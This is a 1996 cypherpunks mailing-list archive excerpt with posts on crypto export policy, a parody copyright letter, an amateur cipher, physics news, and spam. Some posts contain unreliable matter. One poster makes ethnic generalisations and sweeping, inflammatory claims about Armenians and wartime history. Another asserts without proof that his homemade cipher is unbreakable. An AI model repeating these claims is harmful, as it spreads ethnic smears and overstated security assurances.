>    system for electronic commerce. This far exceeds the 40-bit encryption
>    code permissible for export under the U.S. Munitions Control List.
>

At the Bernstein case oral arguments last September, I distinctly
remember the government lawyer stating that the United States does
not restrict "financial cryptography." Perhaps he should have
qualified his argument somewhat.

This statement bothered me, as I cannot understand how an encryption
algorithm can "know" that it is encrypting a financial transaction,
rather than some non-financial document that would be export-restricted.

Martin Minow
minow@apple.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 30 Oct 1996 15:30:57 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: slander and call for lawyers. :)
In-Reply-To: <Pine.LNX.3.94.961030212003.442A-100000@random.sp.org>
Message-ID: <cDumwD3w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


The Deviant <deviant@pooh-corner.com> writes:

> On Wed, 30 Oct 1996, Dr.Dimitri Vulis KOTM wrote:
> 
> > A related question: when persons of Japanese descent (including 3rd generat
> > U.S. citizens) were rounded up during WW2 and confined to concentration cam
> > where many died from deprivation and disease, why weren't persons of Armeni
> > descent similarly "interned"? Weren't they even more sympathetic to the Naz
> > that persons of German descent?
> 
> Because people of Japanese heritage are far easier to spot in a crowd in
> this country than people of western-European heritage.

Hmm... The fascist Roosevelt administration had to rely on Census records
to ferret out the suckers who identified themselves as having enemy japans
blood flowing in their veins.

I guess people of German descent weren't rounded up because there were so
many of them. (My grandmother is allegedly German.)

Armenians aren't western-European and certain't don't look European, IMO.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.net>
Date: Wed, 30 Oct 1996 17:19:59 -0800 (PST)
To: cypherpunks@toad.com
Subject: silly putty
Message-ID: <199610310119.RAA22566@clotho.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	Would anyone be interested in 50 pounds of silly putty? A
friend of mine would be grateful if I could help him get rid of 50
pounds of silly putty. It would be $500.

-- 
Sameer Parekh					Voice:   510-986-8770
C2Net						FAX:     510-986-8777
The Internet Privacy Provider
http://www.c2.net/				sameer@c2.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Bell <dbell@maths.tcd.ie>
Date: Wed, 30 Oct 1996 09:24:10 -0800 (PST)
To: Asgaard <cypherpunks@toad.com>
Subject: Re: When did Mondex ever claim to be anonymous?
In-Reply-To: <Pine.HPP.3.91.961029194511.27228A-100000@cor.sos.sll.se>
Message-ID: <9610301722.aa12547@salmon.maths.tcd.ie>
MIME-Version: 1.0
Content-Type: text/plain


In message <Pine.HPP.3.91.961029194511.27228A-100000@cor.sos.sll.se>, Asgaard w
rites:
>Disinformation is a time-honoured weapon in political struggle.
>A rumour is called just that because it can't easily be checked
>- somebody heard from somebody, who heard from somebody etc. The
>spreader is hardly ever discredited since he does not guarantee
>the validity of the information. 'It's just a rumour, but...'

	The problem I have is with the "hardly ever" part - there is always
a chance of being caught out. I prefer the idea of something that can be
verified - like the lawsuit against Mondex. Making a case with documentation
is more impressive, IMHO.

>Those arguing in favour of Big Brother - 'the needs of law enforcement'
>- frequently use (probably false) information that is hard to check, to
>impress the public: about terrorists stopped by wiretapping,

	This is interesting, as the UK police don't claim they need such
powers to deal with the IRA. Now they may already have large wiretapping
powers under law, but I get the impression that most successful anti-IRA
action is due either to infiltration or informers.

>pedophiles in great hordes lurking on the net,

	I know the scares are overblown - there are paedophiles on the net,
but not as many as, say, the tabloid press would claim.

>the infamous 'If you knew what I have been confidentially told' and so on.

	This argument alone would make me suspicious of the claimant.

	IIRC, the bullshit claims are enough to annoy most netizens, though
the politicians aren't aiming at us. Still - I think documented risks of,
say, Mondex would hold more weight.

	Derek




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Bell <dbell@maths.tcd.ie>
Date: Wed, 30 Oct 1996 09:30:49 -0800 (PST)
To: Chris Adams <cypherpunks@toad.com>
Subject: Re: When did Mondex ever claim to be anonymous?
In-Reply-To: <19961030064438640.AAA213@io-online.com>
Message-ID: <9610301724.aa12798@salmon.maths.tcd.ie>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In message <19961030064438640.AAA213@io-online.com>, Adamsc writes:
>And don't forget the old he-denied-a-wild-claim: "Mr. Politician denied
>reports that he spent several days in the Lovebird Inn with a goldren
>retriever, six gallons of coolwhip and a hoover vacuum."

	Ah, but did he use Mondex? :-)

	Derek
-----BEGIN PGP SIGNATURE-----
Version: 2.6.3ia
Charset: noconv

iQCVAgUBMnePR1XdSMogwMcZAQGA4gQAol9k3W59MQAN3/r1FB5XJmCR9GMt6QpO
nIyzC1CExcjr0Fs23wBquIgTO9Fe83IoU7T3yuFYz462GcmjmeD4S1Oj18YDNMpW
b8gJVeBdd7ItFCTkZKHtAxAQ8IFBfNs6zgCk5ZjheF2s9qdmR4IgchOE736DQms/
hyFEuHYZC00=
=+EnA
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Michael Mattsson" <michaelmattsson@momentis.com>
Date: Wed, 30 Oct 1996 14:25:37 -0800 (PST)
To: <dlv@bwalk.dm.com>
Subject: Re: slander and call for lawyers. :)
Message-ID: <19961030172800.209e210c.in@mail.momentis.com>
MIME-Version: 1.0
Content-Type: text/plain
Armenia never entered the war (whether they were sympathetic or not is another matter),  Japan (although i believe never formally 'declared war') pushed USA's button i guess, something to do with an incident at Pearl Harbor <g>.Canada likewise decided to move Canadians of  Japanese decent into 'holding' camps for reasons of national security...  those were enlightened times....I'll end this before we slid further off topic, ----------Michael Mattsson  -  ProgrammerMomentis Systems             michaelmattsson@momentis.com  - http://www.momentis.com   ----------> From: Dr.Dimitri Vulis KOTM <dlv@bwalk.dm.com>> To: cypherpunks@toad.com> Subject: Re: slander and call for lawyers. :)> Date: Wednesday, October 30, 1996 7:16 AM> > Note: I am not subscribed to this mailing list. I've been forcibly> unsubscribed and not permittecd to resubscribe.> > frantz@netcom.com (Bill Frantz) writes:> > I am quite willing to transfer my pledge of $50 (which was given in the> > hope that the event would attract Attila, not Dimitri) to Ray's legal> > defense fund.> >> > I want to be clear that this transfer is only valid for defense.  If the> > fund will be used to legally attack Dimitri, I'd like my money back.  That> > falls in the category of inviting the courts to rule on net-disputes,> > something I would like to discourage.  (Attacking Dimitri seems also to> > fall into the category of bullshit suits, something else I would like to> > discourage.)> > You seem to be confused. No one suggested that I have any plans to sue> Ray Arachelian. Some of the lies he and Tim May posted to this mailing> list are probably actionable, but I don't believe in suing over something> said on the net.> > Ray Arachelian has repeatedly threatened to sue me over my posts to this> mailing list, and that's what his legal fund is for. It is by no means a> legal "defense" fund.> > A related question: when persons of Japanese descent (including 3rd generation> U.S. citizens) were rounded up during WW2 and confined to concentration camps,> where many died from deprivation and disease, why weren't persons of Armenian> descent similarly "interned"? Weren't they even more sympathetic to the Nazis> that persons of German descent?> > ---> 


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ross Wright" <rwright@adnetsol.com>
Date: Wed, 30 Oct 1996 18:13:02 -0800 (PST)
To: cypherpunks@toad.com
Subject: Risk Assesment Software?
Message-ID: <199610310213.SAA21480@adnetsol.adnetsol.com>
MIME-Version: 1.0
Content-Type: text/plain


Hi.

I am about to do some marketing on a certain company's Risk 
Assessment Software.  At this time I can't say who that firm is, but 
I need information on what other firms are offering this type of 
software.  I figured someone on this list would know.

Thanks, in advance.

Ross

=-=-=-=-=-=-
Ross Wright
King Media: Bulk Sales of Software Media and Duplication Services
http://www.slip.net/~cdr/kingmedia
Voice: 415-206-9906




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Ray <jmr@shopmiami.com>
Date: Wed, 30 Oct 1996 15:51:42 -0800 (PST)
To: cypherpunks@toad.com
Subject: [NOISE]Re: Sex, drugs, and libertarianism
Message-ID: <199610302351.SAA205610@osceola.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Mime-Version: 1.0
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

To: SAlanEd@concentric.net, cypherpunks@toad.com
Date: Thu Oct 31 06:51:05 1996
Steve Edwards writes:

...

<snip>

>I agree that the war on drugs is useless, and that prohibiting
> prostitution is even more mindless.  Still, the libertarian ideal seems
>  even
> worse.  Think about Thailand, where sex is bought and sold openly.  The
>  AIDs
> infection rate has gone from near zero to 2.5% in a couple of years, and
> promises to devastate the whole country. Burmese kids are sold into sex
> slavery.   Is this the future?  People make choices every day, but few
> people make INFORMED choices, and a lot of people, believe it or not,
>  have
> very little choice.  They are caught between the Devil and the Deep Blue
>  Sea.  

1. Prostitution is (nominally) illegal in Thailand.

2. So, what would you do? (I'd still make it legal.)

The issue is more complex than many would make it out to be. Where 
prostitution is legal in this country (Nevada) the marketplace seems, 
without the help of Dr. Kessler and his minions, to have dictated the 
universal use of condoms, and the spread of all STDs is slower than in other 
areas, like here in Miami (where prostitution is (nominally) illegal.
JMR



Regards, Jim Ray -- DNRC Minister of Encryption Advocacy

"They never say: 'Please vote for me because I have an obsessive,
all-consuming need, bordering on mental illness, to live in the
White House and fly around in Air Force One and have a vast
entourage of lackeys.'" -- Dave Barry, describes Bill, Bob, and
Ross in the Miami Herald, September 22, 1996

Defeat the Duopoly! Vote Harry & Jo http://www.HarryBrowne96.org/
___________________________________________________________________
PGP id.E9BD6D35 51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8
I will generate a new (and bigger) PGP key-pair on election night.
jmr@shopmiami.com
___________________________________________________________________

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMniSrm1lp8bpvW01AQGGxAP/b72K+0PXT9xxE1E2KCgls5iXSvVvlnoa
aqG3mJuVjPDbPLVCav5ajHjdO8IoNyk7B6LnoBRH0haTn+3yd0tHYI/yMRKwmaJR
4FjmoTKDOF45obWtynqalfHetkAfZtBzVfyM4iLHG5YHnGiEgKg8baiffr6AGxYp
me6gehTq1p8=
=296o
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: peter.allan@aeat.co.uk (Peter M Allan)
Date: Wed, 30 Oct 1996 11:07:23 -0800 (PST)
To: cypherpunks@toad.com
Subject: Montgolfier was a JOKE
Message-ID: <9610301907.AA02776@clare.risley.aeat.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



The Montgolfier post sent anonymously
was a joke and I thought quite a good one.
(It wasn't me and I don't know who it was.)

It was poking fun at the QED pest at cyberstation
who really was writing drivel.

So far 2 people have missed the point and let 
us know about it.



 -- Peter Allan    peter.allan@aeat.co.uk




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Wed, 30 Oct 1996 17:10:49 -0800 (PST)
To: cypherpunks@toad.com
Subject: update.293 (fwd)
Message-ID: <199610310110.TAA01909@einstein>
MIME-Version: 1.0
Content-Type: text


Forwarded message:
>From physnews@aip.org Wed Oct 30 17:36:20 1996
Date: Wed, 30 Oct 96 13:58:39 EST
From: physnews@aip.org (AIP listserver)
Message-Id: <9610301858.AA27601@aip.org>
To: physnews-mailing@aip.org
Subject: update.293



PHYSICS NEWS UPDATE                         
The American Institute of Physics Bulletin of Physics News
Number 293  October 30, 1996    
by Phillip F. Schewe and Ben Stein

SIGNAL TRANSMISSION THROUGH A MAMMALIAN
NERVE-CELL NETWORK can be enhanced with the help of
electrical noise, a new experiment has shown.  First proposed to
explain the periodicity of ancient ice ages (in which the random
"noise" of climate variations may have augmented the effects of
predictable Earth-Sun distance variations from year to year) and first
experimentally demonstrated in lasers (in which the direction of laser
light traveling around a loop was switched from clockwise to
counterclockwise by adding acoustical noise to the crystal from
which the light emerged), the phenomenon of "stochastic resonance"
(SR) describes how introducing a certain amount of noise into a
system can actually enhance the transmission or detection of a weak
signal so as to maximize the ratio of signal to noise.  In the first
demonstration of SR in mammalian tissue, researchers (Mark Spano,
Naval Surface Warfare Center, 301-227-4466) apply a weak electric
signal (containing both signal and noise) to a slice of rat
hippocampus, a brain region essential for memory and other tasks. 
With the slice parallel to the plane in which nerve cells convert
incoming signals into electrical nerve impulses, the researchers 
could transmit a weak signal to all nerve cells in the network. At an
optimal noise intensity a maximum in the signal-to-noise ratio was
reached--a hallmark of SR.  This experiment offers the intriguing
possibility that SR may potentially be exploited to aid transmission,
detection and processing of signals in neuronal networks. (B.J.
Gluckman et al., Physical Review Letters, 4 November 1996.)

A QUANTUM COMPUTER COULD TOLERATE ERRORS while
carrying out calculations, researchers at Los Alamos have now
shown. Computers that operated according to the rules of quantum
mechanics have the potential to perform powerful tasks (such as
factoring huge numbers) because of  their radically different
approach to logic: unlike a conventional computer's bits, which exist
either as a 0 or a 1, a quantum bit (or "qubit") could not only exist
simultaneously as a 0 and a 1 but could interact with other qubits so
that its properties became "entangled" with those of the other qubits.
Yet some physicists argue quantum computers may be impossible to
achieve on a practical level because the slightest amount of noise
would destroy the entanglement and thus corrupt the state of the
qubits.  Up to now, proposed "quantum error correction" schemes
have shown merely how to preserve the state of qubits. Now, Los
Alamos researchers (Raymond Laflamme, 505-665-3394) have
developed an algorithm for carrying out reliable calculations on a
"qubyte" made of 7 entangled qubits while accounting for the
possibility that one of the qubits is corrupt (upcoming paper in Phys
Rev Lett).  Experimentally, quantum computing is regarded as a
long-term possibility: although quantum versions of logic gates have
been constructed (see Update #250), researchers are still working to
entangle more than two quantum systems at a time.

A PHOTOELECTROCHROMIC  (PEC) cell harnesses a
photochromic layer, which changes color by absorbing light, with an
electrochromic layer, which changes color under the influence of an
electric field, to make a self-powered smart window.  On a sunny
day the one layer supplies the photovoltage needed by the other layer
to darken the window, letting in less light and thus lowering air-
conditioning costs.  This photoelectrochromic process, developed by
scientists at the National Renewable Energy Lab in Golden,
Colorado, might also be useful in display applications.  (C.
Bechinger et al., Nature, 17 October 1996.)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@c2.net>
Date: Wed, 30 Oct 1996 19:59:45 -0800 (PST)
To: mail2news@myriad.alias.net
Subject: Release of premail 0.45
Message-ID: <199610310358.TAA11936@blacklodge.c2.net>
MIME-Version: 1.0
Content-Type: text/plain


   This is to announce the release of premail 0.45, an e-mail privacy
tool for Unix. The major new feature is support for the nym.alias.net
style nymservers. Most of this code was contributed by the admin of
nym.alias.net. Thanks!

   Other than that, it's a minor maintenance release. Several small
bugs have been fixed. Thanks to all who wrote in with bug reports.

   For more information, see:

      http://www.c2.net/~raph/premail.html

Raph Levien




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gary Howland <gary@systemics.com>
Date: Wed, 30 Oct 1996 11:05:14 -0800 (PST)
To: Hallam-Baker <hallam@ai.mit.edu>
Subject: Re: FDA_dis
In-Reply-To: <554m18$kq8@life.ai.mit.edu>
Message-ID: <3277A6C2.ABD322C@systemics.com>
MIME-Version: 1.0
Content-Type: text/plain


Hallam-Baker wrote:
> 
> Regulation is not necessarily anti-commerce. UK beef farmers would be
> better
> off today if there had been more regulation, a weak "free-market"
> attitude
> to public health has destroyed the entire industry. 

Really?  Nothing to do with EC MPs preventing them from selling the
stuff to willing buyers outside of the EC then?

Do you really believe the government "knows better" than the farmers? 
Do you believe regulation is free?  And how can you honestly call the UK
agricultural industry a "free-market"?

Gary
--
"People who love the law and sausages should watch neither being made" 
    - Otto Von Bismarck

pub  1024/C001D00D 1996/01/22  Gary Howland <gary@systemics.com>
Key fingerprint =  0C FB 60 61 4D 3B 24 7D  1C 89 1D BE 1F EE 09 06




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 30 Oct 1996 18:00:18 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: slander and call for lawyers. :)
In-Reply-To: <19961030172800.209e210c.in@mail.momentis.com>
Message-ID: <802mwD19w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"Michael Mattsson" <michaelmattsson@momentis.com> writes:
>
> Armenia never entered the war (whether they were sympathetic or not is
> another matter),  Japan (although i believe never formally 'declared war')
> pushed USA's button i guess, something to do with an incident at Pearl
> Harbor <g>.

<100 lines of hexadecimal gunk skipped>

Armenia couldn't have entered the war because it wasn't an independent state.
It surely would have been an Axis ally if it could.  However tens of thousands
of Armenians volunteered to fight for the Nazis and to help kill the Jews.

The "incident" at Pearl Harbor was provoked by the U.S. oil embargo on Japan,
which was viewed as a declaration of war by the Imperial government, who said
so before commencing hostilities.  You should stop repeating U.S. propaganda
and learn some historical facts.  Remember how the U.S. bombed the hell out
of Iraq and murdered thousands of people over a much less crucial oil source?

(I suppose the use of census data to ferret out the unfortunate Japanese and
to ship them to concentration camps makes this somewhat crypto-relevant. :-)

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Wed, 30 Oct 1996 20:26:22 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: "Montgolfiering" mindlessness
Message-ID: <199610310426.UAA22752@netcom6.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Gee, I put that post in the same place I carefully keep my back issues of
the Cypherpunks Enquirer.


-------------------------------------------------------------------------
Bill Frantz       | Tired of Dole/Clinton?     | Periwinkle -- Consulting
(408)356-8506     | Vote 3rd party.  I'm       | 16345 Englewood Ave.
frantz@netcom.com | Voting for Harry Browne    | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <gbroiles@netbox.com>
Date: Wed, 30 Oct 1996 21:00:01 -0800 (PST)
To: sameer <sameer@c2.net>
Subject: Re: silly putty
Message-ID: <3.0b28.32.19961030203243.00739ab4@mail.io.com>
MIME-Version: 1.0
Content-Type: text/plain



>	Would anyone be interested in 50 pounds of silly putty? A
>friend of mine would be grateful if I could help him get rid of 50
>pounds of silly putty. It would be $500.

Dear Mr. Parekh:

I represent the Comic Publishers Association, a trade group formed to
combat the illict theft of our members' intellectual property. Your message
has come to the attention of our "flexible media" section, which licenses
the duplication of our  members' creative efforts in flexible media, such
as Silly Putty (tm). Many people do not realize (or, more likely, merely
pretend not to realize) that the duplication, even in mirror image, of
portions of protected comic strips in  flexible media infringes upon our
members' exclusive rights as granted by the Copyright Acts of 1909 and
1976, 17 USC 101 et seq.

Further, the irresponsible distribution of this flexible media by
fly-by-night retailers and distributors compounds this problem. Many of the
wrongdoers who violate our members' rights do so as part of an informal
social framework, utilizing aliases like "Junior", or common first names
such as "Billy" or "Tommy". You can imagine our members' frustration when
we must enforce our rights against six and seven year old defendants known
merely as "Jimmy" or "that big kid from soccer practice".

The fact that flexible media can be used to make illicit copies of visual
art is well known; in fact, it is one of the selling points used when
flexible media is sold at the retail level. It is our position that
distributors and retailers selling flexible media do so knowing full well
that their juvenile purchasers intend to irresponsibly flout the Copyright
Act; and that such sales constitute contributory infringement. Sellers of
flexible media are the linchpins in the deadly chain of comic book
copyright infringement via "Silly Putty (tm)". 

We realize that some retailers do not wish to be complicit in this serious
injustice. Therefore, we have drafted the "flexible media code of conduct",
which we are asking sellers of flexible media to sign. We are asking you to
sign this code of conduct as a demonstration of your good will and
responsibility towards copyright owners worldwide. If you do not sign our
code of conduct we'll make some stuff up and then sue you and send out lots
of press releases. 

 ---

FLEXIBLE MEDIA SELLER'S CODE OF CONDUCT

As a seller of "Silly Putty (tm)" flexible media, I agree to:

1.	Maintain records of the first name, last name, parent(s)' names,
school's name, teacher's name, and grade level of every purchaser of
flexible media.

2.	Present an educational program which will sensitize my customers to the
grave responsibilities that the Copyright Act imposes upon each of us.

3.	Police my customers' use of flexible media, including but not limited to
in-store use of flexible media, simultaneous purchases of flexible media
and comic books such that illegitimate use can be inferred from the
circumstances, and the structuring of transactions to obscure what would
otherwise be simultaneous or contemporaneous purchases of flexible media
and comic books.

4.	Cooperate with the Comic Publishers Association by providing customer
lists and transaction detail logs so that suspicious purchase patterns at
multiple retail location may be tracked by the CPA.

5.	Agree to allow the CPA to audit my records and record keeping
procedures, at any time, without notice or right to refuse. 

 ---

Please print out a copy of our agreement, sign it, and mail it to me via
postal mail by the close of business tomorrow. Flexible media copies are
not acceptable. If you don't, we'll kick your ass. 

Have a nice day. 

/s/ L. Itta-Gator (#65535)
for DEWEY, CHEATHAM, & HOWE, P.C.
Counsel for Comic Publishers Association





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Wed, 30 Oct 1996 18:55:02 -0800 (PST)
To: cypherpunks@toad.com
Subject: WWII & Japan
Message-ID: <199610310255.UAA02084@einstein>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> >
> > Armenia never entered the war (whether they were sympathetic or not is
> > another matter),  Japan (although i believe never formally 'declared war')
> > pushed USA's button i guess, something to do with an incident at Pearl
> > Harbor <g>.

Japanese Ambassador Kichisaburo Nomura and Special Ambassador Saburo Kurusu
were to present Secretary of State Cordell Hull a Declaration of War at 1pm
Washington time on Dec. 7th. To achieve technical compliance with
international rules it was intended to be delivered approx. 30 minutes prior
to the actual attack. There were decoding difficulties however and it was
delivered after the attack. Neither of the Ambassadors is thought to have
had any knowledge of the actual attack and therefore did not understand the
criticality of delivery. Japan intended to go to war with the United States,
Great Britian, and Holland over their policies concerning the Japanese
presence in China and Manchuria.


(1)  East Wind Rain: A pictorial history  of the Pearl Harbor attack
     Stan Cohen
     ISBN 0-933126-15-8

(2>  The Pacific War Atlas 1941 - 1945
     David Smurthwaite
     ISBN 0-8160-3286-6

                                                     Jim Choate

 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Wed, 30 Oct 1996 13:23:44 -0800 (PST)
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Subject: Re: slander and call for lawyers. :)
In-Reply-To: <JL3LwD14w165w@bwalk.dm.com>
Message-ID: <Pine.LNX.3.94.961030212003.442A-100000@random.sp.org>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 30 Oct 1996, Dr.Dimitri Vulis KOTM wrote:

> A related question: when persons of Japanese descent (including 3rd generation
> U.S. citizens) were rounded up during WW2 and confined to concentration camps,
> where many died from deprivation and disease, why weren't persons of Armenian
> descent similarly "interned"? Weren't they even more sympathetic to the Nazis
> that persons of German descent?

Because people of Japanese heritage are far easier to spot in a crowd in
this country than people of western-European heritage.

 --Deviant
Killroy was here.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cypher@cyberstation.net
Date: Wed, 30 Oct 1996 20:16:33 -0800 (PST)
To: Adam Shostack <adam@homeport.org>
Subject: Re: Q.E.D   P+P == talk the talk - but - P+P != walk the walk
In-Reply-To: <199610282054.PAA10298@homeport.org>
Message-ID: <Pine.BSI.3.95.961030215852.13047G-100000@citrine.cyberstation.net>
MIME-Version: 1.0
Content-Type: text/plain




On Mon, 28 Oct 1996, Adam Shostack wrote:

> cypher@cyberstation.net wrote:
> 
> | I withdrew the OTP claim and posted the ENTIRE algorithm, in a posting
> |  
> |            dated 10-24-96
> |            addressed to Adam Shostack,
> |                     and titled
> | Montgolfiering P Information= P log_base_infinity P, 
> 
> I never saw this post.  I speak up only becauase quite a few people
> have sent me mail asking for it, and I've never seen it.


I do not know what is going on. Some people seem to have seen it while
others have not. I got a copy of it from cypherpunks. I do not know
what happen to your copy. It is primarily an abbreviated
disclosure of the real algorithm - a full copy is at:

            netprivacy.com/algo.html

The primary purpose of the posting was to try to stop Perry Metzger's
factoid that the algorithm had been broken by Adam. What he was speaking
to was the fact that a previous algorithm, which some people, perhaps most
people, knew was not the real algorithm, was alleged to have been broken.
A careful review of the new algorithm reveals why the break was
alleged, instead of a real, as witnessed by the fact that known plain
text might be used to recover the key for a specific message but would
not be an overall system break. In a way, that is entirely beside the
point since the "old" algorithm was only a ploy on my part in order to get
some additional people to review the real algorithm. I was successful in
that regard.

> 
> | Since, then they they have suddenly grown silent. Nary a peep out of the
> | previously oh so vocal. It is obvious that they are totally clueless about
> | how to go about breaking the  algorithm, or they would have jumped at the
> | opportunity to add a notch to their analytical gun.  As becomes quickly
> | apparent, the algorithm cannot be broken except by brute force, which is
> | patently impossible.
> 
> 	Perhaps you'd care to share the mail that you sent me with the
> list?  I refer to a message with Message-ID
> Pine.BSI.3.95.961023194449.4317A-100000@citrine.cyberstation.net
> 
> Adam
> 
I would be glad to do so , however; as you know, there was another
principal involved in that message. Upon receipt of his approval, I will
be glad to share it with the list. I would also appreciate your and his
response before such posting. That is, where you disagree with my
contentions, and why since you have been silent on that matter. 


With every best wish,

Donald R. Wood 
> 
> 
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Lurker" <lurker@mail.tcbi.com>
Date: Wed, 30 Oct 1996 20:37:44 -0800 (PST)
To: cypherpunks@toad.com
Subject: Privacy Issues
Message-ID: <3.0.32.19961030224729.006ab820@mail.tcbi.com>
MIME-Version: 1.0
Content-Type: text/plain


I am writing a paper for a computer ethics class about privacy and
technology.  I was wondering if anyone could suggest some good books,
periodicals, or (of course) reliable web sources.

Thanks...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Wed, 30 Oct 1996 23:13:54 -0800 (PST)
To: paratama@idola.net.id
Subject: Re: UNSUBCRIBE CRYPTO
In-Reply-To: <9610302341.AA16734@merak.idola.net.id>
Message-ID: <3278516C.3CB1@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


paratama@idola.net.id wrote:
> UNSUBCRIBE [CRYPTO]

Well, if it were up to me, I'd "unsubcribe" you all right, but it's not.  I don't think 
you realize who you're dealing with. I've crossed the wrong people now and then, posting 
messages I shouldn't have, and I've been lucky so far.  If I were in your position, I'd 
get some advice from one of those guru-types who know their way around these places.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cypher@cyberstation.net
Date: Wed, 30 Oct 1996 21:14:14 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Q.E.D  (fwd)
Message-ID: <Pine.BSI.3.95.961030231236.13047M-100000@citrine.cyberstation.net>
MIME-Version: 1.0
Content-Type: text/plain



The following was sent to an individual in response to a private inquiry.
I am forwarding the response since it seems to be germane to the
subject at hand.

Have you looked at the algorithm. A brief explanation is disclosed
in the other posting being made to you. However, a much more detailed
disclosure and explanation is set out at our web site:

             netprivacy.com

The algorithm is at:

             netprivacy.com/algo.html

If you know cryptography, you will discover that it produces quite a
remarkable  PRNG stream, one that when submitted to any statistical
analysis, including Shannon to a degree, reveals itself to be random,
though we know it is not because it was generated by the algorithm. At
first blush, it may appear as some form of a linear congruential generator. 

However, that is a misconception as you can quickly determine. There are
nonlinear congruential generators, somewhere between 49 and 79 separate
ones,  of a sort used in the algorithm, but they serve only as a seed,
to every block of 4 or 8 characters, to the main algorithm. The nonlinear
congruential generators are modulo 16384, which produces a staccato stream
of the set 0,..,16383, which in the case of the disclosed algorithm are
further used to make a three dimensional table lookup in the Displacement
Table, the Determinate Table, and finally the Diffusion Table. 

The nonlinear congruential generators run at different speeds, that is
in C iterations, they are used only C mod 16384 times, and since  all of
them are unique, out of say a message length of 20,000 characters, they
will each be used at a different number of times, and with different
message constituents, that is they cannot be blocked, as seeds to the
table lookup procedures. The three tables are dynamic, undergoing constant
modification, the Diffusion table only at the completion of an 8192 byte
cycle, as the stream is generated. Furthermore, the indexes into the three
lookup tables are accumulative and are being constantly switched so that
they too are always dynamic. 

A close examination of this will reveal that the output stream is a
statistical random appearing stream, as a result of the staccato nature
of the seeds combined with the fact that the sum of seeds start
asymptotically approaching an even distribution of the values 0,..,16383.  

The Displacement Table and the Diffusion Table, are both tables of the
integers 0 through 4095 respectively and the Diffusion Table is a table of
16 sets of the ASCII decimal values, 0,.., 255. All three tables are
scrambled using a random key generated by the user. The process of doing
that is explained in the aforementioned web page:

          netprivacy.com/algo.html

An user may also uniquely customize their own initial Displacement,
Diffusion and Determinate tables, some 10^34000 possibilities. 

Also 200 million bytes of raw encryptor stream output are at our web site,
using the same key and other parameters. Can you determine the key? The
algorithm is quite simple to implement for testing purposes, and you can
use the table values set out as the basis for doing your own testing.

You will find that it produces an incredible random like PRNG streams,
each unique, if you look at it. 

With kindest regards, 


Don Wood,










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Hale <bhale@ptw.com>
Date: Thu, 31 Oct 1996 00:06:25 -0800 (PST)
To: cypherpunks@toad.com
Subject: Why waste your money? Save big on long distance
Message-ID: <32785763.3EAD@ptw.com>
MIME-Version: 1.0
Content-Type: text/html

Title: A opportunity you can really be happy about! 





Hi ! Thank you for takeing a look at this post!
 Are you looking for a business that you can really be proud of ? Do you want to have a product that every
household can't do without  ? Would you like to save these households virtually half  of
what they are now spending, With a product thats meets or exceeds the product they are now useing ?
Would you do all of this if you can get started for free ? 
If this sounds like something you can represent ; you could get started now and be your own boss in  a 
year . This is a product  and business you can be proud of !
Please go to the first link and get signed up for free today.
Best of regards Brian Hale
PS If there is anything that I can do to help you get started please please
do not hesitate to ask. I love people and I love to help.
Click Me
Click Me 2
Email Me 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
